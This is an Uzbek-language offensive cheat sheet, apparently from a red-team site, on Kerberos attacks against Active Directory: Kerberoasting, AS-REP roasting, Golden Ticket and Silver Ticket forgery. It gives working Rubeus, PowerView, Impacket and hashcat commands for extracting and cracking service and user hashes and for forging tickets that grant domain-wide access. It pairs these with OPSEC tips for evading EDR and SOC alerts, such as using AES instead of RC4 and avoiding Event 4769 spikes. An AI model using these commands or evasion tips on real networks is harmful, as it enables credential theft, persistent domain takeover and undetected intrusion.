Kerberos Attacks | 0xAkatsuki

Kerberoasting (TGS-REQ Extraction)

SPN ega accountlar uchun TGS ticketlari so'rab, ularni offline crack qilish. Native metodlar yoki AES bypass orqali EDR dan qochish.

!Barcha foydalanuvchilarni bir vaqtda roast qilmang — Event 4769 da katta spike hosil bo'ladi. Faqat aniq targetlarga qarshi ishlang.

PowerShell / BashPowerShell / Bash

# [Native LotL] SPN ega foydalanuvchilarni topish
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname

# [Native .NET] Rubeus imzosiz TGS so'rash
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken `
-ArgumentList "MSSQLSvc/sql.domain.local:1433"

# [Rubeus] Aniq targetga qarshi — OPSEC
.\Rubeus.exe kerberoast /user:svcSQL /nowrap /outfile:hashes.txt

# Offline cracking
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule --force

AS-REP Roasting

Kerberos preauthentication o'chirilgan accountlar uchun AS-REP ticket so'rash. Hech qanday dastlabki imtiyoz talab qilmaydi — faqat tarmoq kirishi kifoya.

→Bu hujum uchun domain credentiallari ham kerak emas — faqat tarmoqqa kirish yetarli.

PowerShell / BashPowerShell / Bash

# [PowerView] Zaif accountlarni topish
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname

# [Rubeus] AS-REP hash olish
.\Rubeus.exe asreproast /user:TargetUser /nowrap /outfile:asrep_hashes.txt

# [Impacket] Domain membership siz remote extraction
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt

# Offline cracking
hashcat -m 18200 asrep_hashes.txt wordlist.txt

Golden Ticket (TGT Forgery)

Buzilgan krbtgt hashi yordamida TGT qalbakilashtirish — to'liq va doimiy domain hukmronligi.

⚿OPSEC qoidasi: RC4 o'rniga AES-256 ishlating. RC4 Golden Ticketlar zamonaviy SOC larda darhol alert triggerlaydigan.

PowerShellPowerShell

# AES-256 Golden Ticket forgery va xotiraga inject qilish
.\Rubeus.exe golden /aes256:KRBTGT_AES_KEY /domain:domain.local `
/sid:DOMAIN_SID /user:Administrator /ptt

# [Forest Compromise] SID History bilan (Child-to-Parent Trust Abuse)
.\Rubeus.exe golden /aes256:CHILD_KRBTGT_AES /domain:child.domain.local `
/sid:CHILD_SID /sids:PARENT_ENTERPRISE_ADMIN_SID /user:Administrator /ptt

Silver Ticket (TGS Forgery)

Aniq servis uchun TGS qalbakilashtirish. DC bilan muloqot yo'q — traffic faqat attacker va target o'rtasida.

→Silver Ticket eng stealth ticket hujumi — DC loglarida hech narsa qolmaydi.

PowerShellPowerShell

# CIFS servisi uchun AES-256 Silver Ticket (File Share / WMI / PSRemoting)
.\Rubeus.exe silver /aes256:SERVICE_AES_KEY /domain:domain.local `
/sid:DOMAIN_SID /user:Administrator `
/service:cifs/target.domain.local /ptt

# Maqsadli servislar: cifs (SMB), host (Tasks), wmi (WMI), http (WinRM)

OPSEC Notes & Telemetry Matrix

Texnika	Risk	EDR Telemetry	OPSEC Yechim
Kerberoast (All users)	High	Event 4769 (Ko'p TGS Request).	Aniq targetlar. Native .NET classes.
Kerberoast (RC4)	High	Event 4769, Encryption Type 0x17 (RC4).	AES-256 ishlating — RC4 darhol ko'rinadi.
AS-REP Roast	Medium	Event 4768 (pre-auth siz TGT Request).	Legacy app traffic bilan qorishib ketadi.
Golden Ticket (RC4)	Critical	TGS-REQ yo'q, RC4 encryption, anormal lifetime.	AES-256. Default 10 soatlik lifetime.
Silver Ticket	Low	DC loglarida hech narsa yo'q.	Faqat target mashinada local detection.